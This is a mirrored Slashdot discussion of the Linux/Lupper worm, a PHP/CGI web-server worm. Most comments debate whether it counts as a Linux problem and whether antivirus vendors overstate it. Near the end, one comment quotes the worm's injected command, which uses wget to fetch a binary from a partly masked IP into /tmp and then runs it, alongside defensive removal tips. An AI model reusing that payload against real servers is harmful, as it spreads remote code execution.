Slashdot Mirror
Linux Lupper.Worm In the WIld
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Seems kind of wrong to name it exclusively a linux problem.
...then it's a PHP/*nix worm, not Linux specifically.
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
...Linux is more and more popular with corporations holding valuable and important data.
;)
Success is a double-edged sword.
Loading...
"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
More alarmist shit (and old news at tht - The Reg reported this last week).
Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.
The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.
IE Worm = Windows worm.
Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.
Well, actually, yes. Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.
Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.
Bradley Holt
The key word is "attempts".
Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?
The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.
Now:
In other words, nothing to see here but more antivirus vendor fud.
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.That's what you believe. Yet my bank example shows that popularity has nothing to do with security.That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
step one go to securityfocus and update all of the applications listed on your system. /tmp/lupii /tmp/lupii" su -c"touch tmp/lupii"
/tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
Symptoms
Presence of the following file:
*
One of the following ports are listening:
* UDP 7111
* UDP 7222
so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm
the worm appearent does this
echo '_begin_';echo `cd
so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.
Apocalypse Cancelled, Sorry, No Ticket Refunds